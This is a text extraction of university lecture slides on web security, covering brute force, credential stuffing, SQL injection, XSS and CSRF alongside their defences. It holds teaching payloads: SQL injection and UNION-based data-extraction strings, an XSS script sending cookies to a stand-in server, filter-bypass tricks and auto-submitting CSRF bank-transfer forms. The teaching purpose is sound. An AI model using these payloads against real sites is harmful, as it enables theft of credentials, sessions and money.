SLIDE 1
Web Security
Software Studio yslin@DataLAB
1
Common Security Risks
- Brute-Force Attacks
- SQL Injections
- Cross-Site Scripting (XSS)
- Cross-Site Request Forgery (CSRF)
2
eb Security Software Studio yslin@DataLAB 1 Common Security - - PowerPoint PPT Presentation
eb Security Software Studio yslin@DataLAB 1 Common Security - - PowerPoint PPT Presentation
eb Security Software Studio yslin@DataLAB 1 Common Security Risks Brute-Force Attacks SQL Injections Cross-Site Scripting (XSS) Cross-Site Request Forgery (CSRF) 2 Common Security Risks Brute-Force Attacks SQL
SLIDE 2
SLIDE 3
Common Security Risks
- Brute-Force Attacks
- SQL Injections
- Cross-Site Scripting (XSS)
- Cross-Site Request Forgery (CSRF)
3
SLIDE 4
Username: Password:
4
SLIDE 5
admin
Username: Password:
5
SLIDE 6
admin
Username: Password: 00000
6
SLIDE 7
admin
Username: Password: 00000
Close
Wrong Password
7
SLIDE 8
admin
Username: Password: 00001
8
SLIDE 9
admin
Username: Password: 00000
Close
Wrong Password
9
SLIDE 10
admin
Username: Password: 00002
10
SLIDE 11
admin
Username: Password: 00000
Close
Wrong Password
11
SLIDE 12
12
SLIDE 13
admin
Username: Password: 04876
13
SLIDE 14
admin
Username: Password: 04876
Close
Access Granted
14
SLIDE 15
admin
Username: Password: 04876
Close
Access Granted
Usually hackers do this using scripts
14
SLIDE 16
How to Defense ?
15
SLIDE 17
How to Defense ?
Limit how many times a user can try to login in a given time window. Rate Limiter - A Node.js library
15
SLIDE 18
admin
Username: Password: 00002
16
SLIDE 19
admin
Username: Password: 00000
Close
Please Try It 5 minutes Later
17
SLIDE 20
admin
Username: Password: 00000
Close
Please Try It 5 minutes Later
17
SLIDE 21
But May Not Work To Credential Stuffing
18
SLIDE 22
But May Not Work To Credential Stuffing
18
SLIDE 23
Username Password user pass admin admin brandon wu cat meow nthu uhtn aaa bbb abcde 12345
A list of known username-password pairs
- btained from another service.
19
SLIDE 24
Username Password user pass admin admin brandon wu cat meow nthu uhtn aaa bbb abcde 12345
A list of known username-password pairs
- btained from another service.
cat
Username: Password:
meow
19
SLIDE 25
Here is the list of prevention strategies
20
SLIDE 26
Here is the list of prevention strategies
The most common strategy is CAPTCHA
20
SLIDE 27
Common Security Risks
- Brute-Force Attacks
- SQL Injections
- Cross-Site Scripting (XSS)
- Cross-Site Request Forgery (CSRF)
21
SLIDE 28
Username: Password:
22
SLIDE 29
function get(username, password) { const sql = ` SELECT * FROM users WHERE username = '${username}' AND password = '${password}' `; return db.any(sql); }
23
SLIDE 30
cat
Username: Password: meow
SELECT * FROM users WHERE username = 'cat' AND password = 'meow'
24
SLIDE 31
cat
Username: Password: meow
SELECT * FROM users WHERE username = 'cat' AND password = 'meow'
username password name cat meow A Cat
24
SLIDE 32
SQL Injections
Users Do What You Do Not Expect
25
SLIDE 33
cat
Username: Password: 1' OR '1' = '1
SELECT * FROM users WHERE username = 'cat' AND password = '1' OR '1' = '1'
26
SLIDE 34
cat
Username: Password: 1' OR '1' = '1
SELECT * FROM users WHERE username = 'cat' AND password = '1' OR '1' = '1'
username password name admin AAAAAAAA Adminstrator cat meow A Cat dog bow A Dog bird chou A Bird
26
SLIDE 35
If your server will return the results directly… (e.g. message boards)
27
SLIDE 36
http://mywebsite.com/posts?id=1
28
SELECT title, message FROM posts WHERE id = 1
SLIDE 37
id title message 1 HL3 When can I see Half-Life 3 coming out ?
http://mywebsite.com/posts?id=1
28
SELECT title, message FROM posts WHERE id = 1
SLIDE 38
A Powerful Keyword UNION
29
SLIDE 39
UNION
SELECT title, message FROM posts SELECT username, password FROM users
title message Knock Knock knock username password admin AAAAAAAA cat meow
30
SLIDE 40
UNION
SELECT title, message FROM posts SELECT username, password FROM users
title message Knock Knock knock username password admin AAAAAAAA cat meow
SELECT title, message FROM posts UNION SELECT username, password FROM users
30
SLIDE 41
UNION
SELECT title, message FROM posts SELECT username, password FROM users
title message Knock Knock knock username password admin AAAAAAAA cat meow
SELECT title, message FROM posts UNION SELECT username, password FROM users
title message Knock Knock knock admin AAAAAAAA cat meow
30
SLIDE 42
http://mywebsite.com/posts?id=-1 UNION SELECT username, password FROM users
31
SELECT title, message FROM posts WHERE id = -1 UNION SELECT username, password FROM users
SLIDE 43
http://mywebsite.com/posts?id=-1 UNION SELECT username, password FROM users
31
SELECT title, message FROM posts WHERE id = -1 UNION SELECT username, password FROM users
title message admin AAAAAAAA cat meow dog bow bird chou
SLIDE 44
Wait !!!!
How Did The Hacker Know What Tables I Have ?
32
SLIDE 45
http://mywebsite.com/posts?id=-1 UNION SELECT table_name, column_name FROM information_schema.columns WHERE table_schema = 'public';
33
SLIDE 46
SELECT title, message FROM posts WHERE id = -1 UNION SELECT table_name, column_name FROM information_schema.columns WHERE table_schema = 'public';
34
SLIDE 47
SELECT title, message FROM posts WHERE id = -1 UNION SELECT table_name, column_name FROM information_schema.columns WHERE table_schema = 'public';
title message users id users username users bow users name posts id posts title posts message
34
SLIDE 48
What If There Are Something Behind The Id In The Query ?
SELECT title, message FROM posts WHERE id = ... AND msg_type = 'public'
35
SLIDE 49
- (comment mark)
36
SLIDE 50
- (comment mark)
p.s. the mark may be different in different database systems
36
SLIDE 51
http://mywebsite.com/posts?id=-1 UNION SELECT username, password FROM users --
37
SELECT title, message FROM posts WHERE id = -1 UNION SELECT username, password FROM users -- AND msg_type = 'public'
SLIDE 52
http://mywebsite.com/posts?id=-1 UNION SELECT username, password FROM users --
37
SELECT title, message FROM posts WHERE id = -1 UNION SELECT username, password FROM users -- AND msg_type = 'public'
Becomes a comment
SLIDE 53
WTF
38
SLIDE 54
The core of this problem is:
The clients’ inputs may be treated as SQL keywords
39
SLIDE 55
The core of this problem is:
The clients’ inputs may be treated as SQL keywords
Prepare Statements !!
39
SLIDE 56
function get(username, password) { const sql = ` SELECT * FROM users WHERE username = '$<username>' AND password = '$<password>' `; return db.any(sql, {username, password}); }
40
SLIDE 57
function get(username, password) { const sql = ` SELECT * FROM users WHERE username = '$<username>' AND password = '$<password>' `; return db.any(sql, {username, password}); }
Your data go here
40
SLIDE 58
More Information
- What you just saw is a kind of syntax provided by
pg-promise
- You can learn more information about prepared
statements on their documents:
- https://github.com/vitaly-t/pg-promise/wiki/Learn-
by-Example#prepared-statements
41
SLIDE 59
Common Security Risks
- Brute-Force Attacks
- SQL Injections
- Cross-Site Scripting (XSS)
- Cross-Site Request Forgery (CSRF)
42
SLIDE 60
Scenario 1
43
SLIDE 61
User: SLMT Steam winter sale starts !! User: MIT Bro
Please type in your message here…
44
My wallet is ready !!
SLIDE 62
<script>alert(“meow”);</script>
45
User: SLMT Steam winter sale starts !! User: MIT Bro My wallet is ready !!
SLIDE 63
<script>alert(“meow”);</script>
46
User: SLMT Steam winter sale starts !! User: MIT Bro My wallet is ready !! User: SLMT
SLIDE 64
User: SLMT Steam winter sale starts !! User: MIT Bro My wallet is ready !! User: SLMT Close
meow
47
SLIDE 65
48
SLIDE 66
But it is just a prank
49
SLIDE 67
But it is just a prank
How can a bad guy use it ?
49
SLIDE 68
50
SLIDE 69
Yummy !
50
SLIDE 70
Yummy !
Cookies are stored in client-sides. They usually have some sensitive data.
50
SLIDE 71
Yummy !
Cookies are stored in client-sides. They usually have some sensitive data.
E.g. A session key for a server to identify a user
50
SLIDE 72
A cookie can be retrieved using javascript
51
SLIDE 73
A cookie can be retrieved using javascript
Try to open a console of a browser, and type in document.cookie
51
SLIDE 74
<script>location.href=("http:// myserver.com/somepage?cookie=" + document.cookie);</script>
52
User: SLMT Steam winter sale starts !! User: MIT Bro My wallet is ready !!
SLIDE 75
http://myserver.com/somepage?cookie=
53
SLIDE 76
http://myserver.com/somepage?cookie=
53
SLIDE 77
http://myserver.com/somepage?cookie=
53
SLIDE 78
Lots of websites having message boards had such vulnerabilities before.
54
SLIDE 79
Lots of websites having message boards had such vulnerabilities before.
So, other websites without such functions are safe ?
54
SLIDE 80
Lots of websites having message boards had such vulnerabilities before.
So, other websites without such functions are safe ?
Not exactly
54
SLIDE 81
Scenario 2
55
SLIDE 82
http://somewebsite.com/showimage?id=1 You are watching an image with id = 1
56
SLIDE 83
http://somewebsite.com/showimage?id=a
57
You are watching an image with id = a
SLIDE 84
http://somewebsite.com/showimage?id=<script>al…
58
You are watching an image with id =
SLIDE 85
http://somewebsite.com/showimage?id=<script>al…
確定
meow
58
You are watching an image with id =
SLIDE 86
Hi~ Hello~ A cute cat !! http://goo.gl/abcdef
59
SLIDE 87
Hi~ Hello~ A cute cat !! http://goo.gl/abcdef http://somewebsite.com/showimage? id=<script>location.href=(“http://myserver.com/ somepage?cookie=" + document.cookie);</script>
59
SLIDE 88
WTF x 2
60
SLIDE 89
Cross-Site Scripting
61
SLIDE 90
Cross-Site Scripting
Cross site to retrieve sensitive data
61
SLIDE 91
Cross-Site Scripting
Cross site to retrieve sensitive data Using scripts to attack
61
SLIDE 92
How To Defense ?
62
SLIDE 93
- 1. Filtering
63
SLIDE 94
Lots of filtering methods
- 1. Filtering
63
SLIDE 95
Lots of filtering methods
But, there are also lots of ways to bypass
- 1. Filtering
63
SLIDE 96
Filtering Method 1
Removing all <script> words
64
SLIDE 97
Filtering Method 1
Removing all <script> words
But using <SCRIPT> will be safe.
64
SLIDE 98
Filtering Method 2
Replace all script
65
SLIDE 99
Filtering Method 2
Replace all script
But, <scscriptript> becomes <script>
65
SLIDE 100
Learning Filtering Methods
- Some practice websites
- alert(1) to win
- If you cannot see the page, try to replace
‘https’ with ‘http’
- prompt(1) to win
66
SLIDE 101
- 2. Escaping
67
SLIDE 102
<script>alert("meow");</script>
68
SLIDE 103
<script>alert("meow");</script> <script>alert("meow");</script>
68
SLIDE 104
<script>alert("meow");</script> <script>alert("meow");</script>
Lots of Framework have provide such built-in functions
68
SLIDE 105
- 3. Browser-support Headers
69
SLIDE 106
Headers
- X-XSS-Protection: 1
- Works in Chrome, IE (>= 8.0), Edge, Safari, Opera
- The browsers will detect possible XSS attacks for you.
- Set-Cookie: HttpOnly
- Disallow the scripts to retrieve
- can only be retrieved by HTTP requests
- More here
70
SLIDE 107
However, according to a research
- f a famous security company…
71
SLIDE 108
However, according to a research
- f a famous security company…
71
Only 20% of websites in Taiwan using those headers.
SLIDE 109
However, according to a research
- f a famous security company…
71
Only 20% of websites in Taiwan using those headers. Only 7.8% of websites using more than two such headers.
SLIDE 110
Some XSS Practices
- XSS Challenges
- XSS Game (Recommend to open using Chrome)
72
SLIDE 111
Common Security Risks
- Brute-Force Attacks
- SQL Injections
- Cross-Site Scripting (XSS)
- Cross-Site Request Forgery (CSRF)
73
SLIDE 112
https://www.bank.com Hi Mr. Rich, Your Balance: $1,000,000
74
SLIDE 113
https://www.bank.com Hi Mr. Rich, Your Balance: 1,000,000 $ https://www.lottery.com Click to win an iPhone!
75
SLIDE 114
https://www.bank.com Hi Mr. Rich, Your Balance: 1,000,000 $ https://www.lottery.com Click to win an iPhone!
76
SLIDE 115
https://www.bank.com Hi Mr. Rich, Your Balance: $87
77
SLIDE 116
https://www.bank.com Hi Mr. Rich, Your Balance: $87
78
SLIDE 117
What Happened?
79
SLIDE 118
The bank may provide an API for transferring money https://www.bank.com/transfer?to_account={name} &amount={amount}
80
SLIDE 119
The hacker then put the following form on the web page
<form method="GET" action="https://www.bank.com/transfer"> <input type="hidden" name="to_account" value="hacker"/> <input type="hidden" name="amount" value="1000000"/> <input type="submit" value="Click to win an iPhone!"/> </form>
81
https://www.bank.com/transfer? to_account=hacker&amount=1000000
SLIDE 120
Wait… but the bank website needs my cookie to grant access, right?
82
SLIDE 121
That’s true. However, the browser will provide the cookie since you are sending requests to the bank’s website.
<form method="GET" action="https://www.bank.com/transfer"> <input type="hidden" name="to_account" value="hacker"/> <input type="hidden" name="amount" value="1000000"/> <input type="submit" value="Click to win an iPhone!"/> </form>
83
SLIDE 122
Cross-Site Request Forgery
84
SLIDE 123
Cross-Site Request Forgery
Cross site to retrieve/execute sensitive data/action
84
SLIDE 124
Cross-Site Request Forgery
Cross site to retrieve/execute sensitive data/action by forging unintentional requests
84
SLIDE 125
Even worse, the hacker can do this:
<iframe style="display:none" name="csrf-frame"></iframe> <form method='GET' action='https://www.bank.com/transfer' target="csrf-frame" id="csrf-form"> <input type="hidden" name="to_account" value="hacker"/> <input type="hidden" name="amount" value="1000000"/> <input type='submit' value='submit'> </form> <script>document.getElementById("csrf-form").submit()</script>
You don’t even need to click it!
85
SLIDE 126
WTF x 3
86
SLIDE 127
How To Defense ?
87
SLIDE 128
Method 1: CSRF Tokens
88
SLIDE 129
https://www.bank.com/transfer?to_account={name} &amount={amount}&token={generated_value} Generate a token on the server-side and add the token to the request url
89
SLIDE 130
https://www.bank.com/transfer?to_account={name} &amount={amount}&token={generated_value} Generate a token on the server-side and add the token to the request url
Only the requests generated by banks will have valid tokens!
Hard for the hacker to know what are the tokens
89
SLIDE 131
Notice for CRSF Token
- The server needs to remember the generated
tokens.
- The server should change tokens frequently
- Node.js library
- https://github.com/expressjs/csurf
90
SLIDE 132
Method 2: SameSite Cookie
91
SLIDE 133
SameSite Cookies
- A http header setting that tells the browser do not
send cookies when the request is not coming from its origin url.
Set-Cookie: session_id=f7s8e9f98es3; Set-Cookie: session_id=f7s8e9f98es3; SameSite=Lax
92
SLIDE 134
Two Modes of SameSite
- “Strict” Mode
- Only send cookies for same-site requests
- “Lax” Mode (more common)
- Will send cookies for non-same-site requests when the
user are navigating to the URL
- Supported by Chrome, Edge, Firefox, Opera
- https://developer.mozilla.org/en-US/docs/Web/HTTP/
Headers/Set-Cookie#Browser_compatibility
93
SLIDE 135
https://blog.techbridge.cc/2017/02/25/csrf-introduction/ An interesting walkthrough for CSRF attacks (recommend to read)
94
SLIDE 136
OWASP Top 10 Security Risks in 2020
Rank Name 1 Injection 2 Broken Authentication 3 Sensitive Data Exposure 4 XML External Entities (XXE) 5 Broken Access Control 6 Security Misconfiguration 7 Cross-Site Scripting XSS 8 Insecure Deserialization 9 Using Components with Known Vulnerabilitie 10 Insufficient Logging & Monitoring
https://owasp.org/www-project-top-ten/
95
SLIDE 137
Resource
96
SLIDE 138
OWASP Juice Shop
- An example project that is developed using
JavaScript and contains many common vulnerabilities including OWASP top 10 risks.
- https://owasp.org/www-project-juice-shop/
97
SLIDE 139
Checklists
- Node.js Security Checklist
- A checklist for developers to prevent security
risks on Node.js.
- Security Checklist Developers
- A general security checklist for backend
developers
98
SLIDE 140
HITCON Zero Days
- A website for users to report the vulnerabilities
they found.
- https://zeroday.hitcon.org/
99
SLIDE 141
Thank You
100